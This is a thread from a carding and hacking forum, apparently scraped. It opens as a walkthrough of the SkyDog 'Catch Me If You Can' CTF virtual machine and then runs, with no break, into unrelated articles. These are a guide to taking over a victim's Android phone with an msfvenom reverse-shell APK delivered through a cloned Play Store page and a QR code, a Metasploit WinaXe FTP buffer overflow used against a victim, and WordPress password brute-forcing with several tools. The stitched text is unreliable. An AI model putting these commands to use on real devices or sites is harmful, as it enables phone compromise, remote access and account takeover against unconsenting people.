[Guide] How to Hack the SkyDog Con CTF – Catch Me If You Can VM

[Guide] How to Hack the SkyDog Con CTF – Catch Me If You Can VM - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Hack the SkyDog Con CTF – Catch Me If You Can VM (/Thread-Guide-How-to-Hack-the-SkyDog-Con-CTF-%E2%80%93-Catch-Me-If-You-Can-VM)

[Guide] How to Hack the SkyDog Con CTF – Catch Me If You Can VM - NINZA - 04-25-2020

SkyDog is the second VM in CTF series created by James Brower. It is configured with DHCP so the IP will be given to it automatically. This VM is based on Catch me if you can which is a movie about Frank who is a conman. So it is correct to assume that a broad OSINT concept will be used in it. This is an amazing VM as it uses about hacking and forensic skills. The author of this VM has given us hints about all the eight flags as below:
Flag # 1: Don’t go, Home Frank! There’s a Hex on Your House.
Flag # 2: Obscurity or Security?
Flag # 3: Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.
Flag # 4: A Good Agent is Hard to Find.
Flag # 5: The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices
Flag # 6: Where in the World is Frank?
Flag # 7: Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!
Flag # 8: Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!
Except this, we know that the flags are in MD5 Hash. You can download it from

[To see content please register here]

.
Penetrating Methodology

Network Scanning (Netdiscover, Nmap)
Examine source code of the web page
Extracting and decoding of hex value for the 1st flag
Login into SSH for the 2nd flag
Abusing HTTPS for the 3rd flag
Intercept the Browser request and Change user-agent (Burp-suite)
Obtain the 4th flag and follow the clue
Explore FBI workstation and abuse its source code FBI.txt file
Decrypt the 5th flag to obtain the credentials
Download the image after login
Extract hidden code from inside the image (steghide)
Open the flag.txt file and capture the 6th flag along with the password.
Login into SSH and capture the 7th flag
Download zip file via SCP and unzip
Forensic Trick-Extract file info to capture the 8th flag (volatility)

WalkThrough
Let us find our target first by using the following command in the terminal of kali :

netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We can clearly see that our target IP is 192.168.1.100. Now as we have identified our target let’s scanning the IP with nmap.

nmap -p- -sV 192.168.1.100
1
nmap -p- -sV 192.168.1.100
[Image: 2.png?w=687&ssl=1]

With the assistance of nmap, you can see that the port number 22, 80, 443, and 22222 are working with the service of SSH (closed), HTTP, HTTPS and SSH (open) respectively. Here, you can observe that using port forwarding the service of SSH has been forwarded to the port number 22222 from its default port that is 22. Also, the service is closed on 22 and open on 22222. This is a minor security feature to throw off attackers.
As port 80 is open, along with 443; we can open this IP in a browser.
[Image: 3.png?w=687&ssl=1]

The home page has nothing to go on for us, therefore, we checked its page source.
[Image: 4.png?w=687&ssl=1]

In the page source, you will find a directory. Let’s open it and see what it has got for us.
[Image: 5.png?w=687&ssl=1]

The directory too didn’t have much to go on, so we viewed the page source again and there we found a hex value. Now from the first hint given by the author, which is Flag #1: Don’t go, Home Frank! There’s a Hex on Your House, we can tell that this hex is our first flag. Let’s convert the hex by using the following command in the terminal of kali :

echo | xxd -p -r
1
echo | xxd -p -r

Here,
xxd: is used to create a hex dump
-p: is used to the output can be in the plain text
-r: is used to convert the hex
[Image: 6.png?w=687&ssl=1]

Using the above command the hex is converted as you can see in the image above. And so when we convert this flag from MD5 hash. Hence, the flag is nmap that means our next hint is nmap and that is where we should look.
[Image: 7.png?w=687&ssl=1]

As explained earlier, the port SSH has been given a security feature in the nmap so we should poke it by typing the following command:

ssh 192.168.1.100 -p22222
1
ssh 192.168.1.100 -p22222
[Image: 8.png?w=687&ssl=1]

And so we have our next flag; upon de-hashing, it turns out to be encrypted.
[Image: 9.png?w=687&ssl=1]

We will find our next flag somewhere in the encryption on the webpage. The most basic encryption given to the webpage is a security certificate. Let’s check that out.
[Image: 10.png?w=687&ssl=1]

Click on the highlight area as shown in the above picture. The following dialogue box will open.
[Image: 11.png?w=687&ssl=1]

Click on the security tab as shown in the above image. And then click on View Certificate button. In the certificate you will find the third flag as shown below:
[Image: 12.png?w=687&ssl=1]

When converted; our next flag turns out to be personnel.
[Image: 13.png?w=687&ssl=1]

I had assumed “personne1” as a directory, so let’s open it in a browser.
[Image: 14.png?w=687&ssl=1]

As shown, the directory says that “you do not appear to be from an FBI workstation” that means there is somewhere FBI workstation. I looked back through every page source we had and found that we need internet explorer 4 for the FBI workstation.
[Image: 15.png?w=687&ssl=1]

Now, reload the personal directory and capture its cooking using burpsuite; which will help you change the browser.
[Image: 16.png?w=687&ssl=1]

In the burpsuite, once you have captured the cookies change user-agent from “Linux x86_64” to “MSIE 4.0” as shown in the images.
[Image: 17.png?w=687&ssl=1]

And once you forward the request from burp-suite and the personal directory page will load. There you will find you’re next flag and a hint with that flag i.e. we have to add a prefix ‘new’ to whatever the flag we have after decrypting hash value.
[Image: 18.png?w=687&ssl=1]

Upon converting our flag is evidence. So adding the prefix new our flag becomes newevidence.
[Image: 19.png?w=687&ssl=1]

Now the directory /newevidence takes us to the FBI login portal.
[Image: 20.png?w=687&ssl=1]

Now we don’t have any username and password and no clue about it too. So I explored its page source.
[Image: 21.png?w=687&ssl=1]

In the page source there we found two important things i.e. evidence.txt When opened, evidence.txt gave us our next flag.
[Image: 22.png?w=687&ssl=1]

Once converted the flag is panam.
[Image: 23.png?w=687&ssl=1]

Now let’s open newevidence which we found in the previous flag.
[Image: 24.png?w=687&ssl=1]

It shows us an image. There must be a stegnographed message in the image. Therefore, use the following command to see it :

steghide extract -sf newevidence.jpeg
1
steghide extract -sf newevidence.jpeg
[Image: 25.png?w=687&ssl=1]

The hidden file was flag.txt to read the flag, type :

cat flag.txt
1
cat flag.txt

By de-hashing the flag we get ILoveFrance. And we also have a clue i.e. iheartbrenda. This flag and clue are both important, make its note.
[Image: 26.png?w=687&ssl=1]

For our seventh flag, we have the hint — Flag # 7: Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive! In this hint, it says “I am the fastest man alive” this is the introductory dialogue of The Flash. And even in the movie, Frank uses a fake name Barry Allen, the original name of the flash.
Therefore, Barry Allen can be our username. Let’s log in through SSH port using BarrAllenen username. When it asked for the password I tried both ILoveFrance and iheartbrenda and fortunately, iheartbrenda was the correct password.
[Image: 27.png?w=687&ssl=1]

Once we were logged in, we used the following commands to find our flag :
ls à to see all the list of all the files
cat flag.txt à to read the flag
And so, we have our next flag. Once de-hashed the flag was the flash
[Image: 28.png?w=687&ssl=1]

As we have both password and username for the login of SSH; here we can use scp service commands. You can use SCP (the scp command) to securely copy files and directories between remote hosts without starting an FTP session or logging into the remote systems explicitly.

scp -P 22222 [email protected]:/home/barryallen/security-system.data /root/Desktop/file
1
scp -P 22222 [email protected]:/home/barryallen/security-system.data /root/Desktop/file

Once you have the file, unzip it and for that type:

unzip file
1
unzip file

Now by using the following command, we complete our CTF challenge.

volatility –f security-system.data notepad
1
volatility –f security-system.data notepad
[Image: 30.png?w=687&ssl=1]

YAY! Once again, we have completed a CTF challenge successfully.

QR Code is a 2-dimensional barcode which can be scanned using Smartphones or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when taking over the whole world as there is growth in SEO.

Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article, we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.

Our step is to create a pernicious file using msfvenom.

msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk
1
msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk
[Image: 1.png?w=687&ssl=1]

Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select the 2nd option which indicates Website Attack Vectors?

Then further select 8th option which refers to HTA Attack Method.
[Image: 3.png?w=687&ssl=1]

And then select Site Cloner by typing 2.
[Image: 4.png?w=687&ssl=1]

When you type the said 2 option, it will ask you to enter the URL that you want to clone. Here give the URL of the play store:

[To see content please register here]

Then when it asks you to select meterpreter option type 3 as we want to select reverse_tcp.
[Image: 6.png?w=687&ssl=1]

Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/
[Image: 7.png?w=687&ssl=1]

Also the change the name of launcher.hta to lancher.apk that your SET had just created as shown below
[Image: 8.png?w=687&ssl=1]

Now add The QR Code Extension to your chrome.
[Image: 9.png?w=687&ssl=1]

The QR Code Extension wills generate a QR Code for you according to your attack.
[Image: 11.PNG?w=687&ssl=1]

Now start multi/handler so you have your session in time and for this type:
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 6666
run
1
2
3
4
5
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 6666
run
[Image: 12.png?w=687&ssl=1]

Now you can move ahead and make the victim scan your code. And install the app.
[Image: 13.png?w=687&ssl=1]

And Voila!! As soon as scanning of the code will be completed, you will have your meterpreter session.
[Image: 14.png?w=687&ssl=1]

This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.

Exploit Targets

WinaXe 7.7 FTP client

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/winaxe_server_ready
msf exploit (winaxe_server_ready)>set lhost 192.168.0.106
msf exploit (winaxe_server_ready)>set srvhost 192.168.0.106
msf exploit (winaxe_server_ready)>set payload windows/meterpreter/reverse_tcp
msf exploit (winaxe_server_ready)>exploit
[Image: 2.png?w=687&ssl=1]

Now send the link to the victim when victim, enter in connection details and wait for the FTP connection WinaXe ftp. You will get victim meterpreter session.

Brute force attack using Burp Suite

To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings.

Now, select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

Now open the WordPress in your pc and it will ask you the username and password. Here, before giving username and password start burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off button.

When you turn on the interception then type any password of your predictions so that the burp suite can capture it. Look at image please notice the last line in fetched data it is show that I tried to login by type admin:admin as username and password respectively.

Send the captured material to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Now open the Intruder tab then select Positions tab without disturbing data click on clear button on right side of frame.

Now select the following as I have selected in the image and click on add button on the right side of frame. This will configure the position where payloads will be inserted into the base request.

Select the type of attack to determine the way in which payload are assigned to payload positions. I will choose cluster bomb as the number of payload set is depend upon attack type and we are having 2 payload positions. Click on start attack.

Click on payload set which will show two numeric numbers 1 and 2 select number 1 for first payload position. Further click on load button in payload option and configure your simple list string that will use as payload or you can add path of any dictionary username only. Similarly select number 2 for another payload position. Add path of any dictionary having password only. Click on start attack.

Now brute attack will match the combination of both payload and try to login in with username and password.

When attack will finished you would get the sure credential by checking status and length which would be different from rest of combination.

From result user:bitnami is username and password respectively.

Brute force attack using wpscan

WPScan is a black box vulnerability scanner for WordPress which is already installed by default in Kali Linux. For WordPress brute force you need a good dictionary or can make your own dictionary for attack.

ruby ./wpscan.rb -url 192.168.1.14 --wordlist /root/Desktop/pass.txt --username user
1
ruby ./wpscan.rb -url 192.168.1.14 --wordlist /root/Desktop/pass.txt --username user

In this brute force attack I have just added wordlist for password. From result user:bitnami is login and password respectively.

Brute force attack using metasploit

This module will test WordPress logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database this module, it will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4
msf auxiliary(wordpress_login_enum) > set rport 80
msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt
msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt
msf auxiliary(wordpress_login_enum) > exploit
1
2
3
4
5
6
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4
msf auxiliary(wordpress_login_enum) > set rport 80
msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt
msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt
msf auxiliary(wordpress_login_enum) > exploit

WordPress brute force successful for login user:bitnami as username and password.

Brute force attack using OWASP ZAP

Zap is an easy to use integrated penetration testing tool for finding the vulnerabilities in web application. Now we will use this tool for brute force attack and the whole process is same as burp suite.

Start OWASP ZAP and turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings. Select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

Now once again open the WordPress in your pc and it will predict the username and password.

It will capture the data as you can see I have login with user as username and password as password. You can see it in the Request section of the tool select the character which you have entered in the page before. Therefore I will select only password from fetched data then use right click for fuzz option.

When you click on fuzz a new window ‘fuzzer’ will get open, now you have to click on add button on left of frame it will open a new window add payload. Click on select and choose your dictionary for attack.

Again click on add button and then click on start fuzzer.

After starting fuzzing again a new screen will open click on option button click to depth first radio button for payload replacement strategy. Select the check box of follow redirects and click to start fuzzing.

When attack will finished you would get the sure credential by checking state and size response header which would be different from rest of combination.

From result bitnami is password for login user.

Brute force attack using Nmap

This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.

Open Kali terminal type following Nmap command
nmap –sV --script http-wordpress-brute --script-args 'userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt, http-wordpress-brute.hostname=domain.com,http-wordpress-brute.thread=3,brute.firstonly=true' 192.168.1.17
1
nmap –sV --script http-wordpress-brute --script-args 'userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt, http-wordpress-brute.hostname=domain.com,http-wordpress-brute.thread=3,brute.firstonly=true' 192.168.1.17
[Image: 24.png?w=687&ssl=1]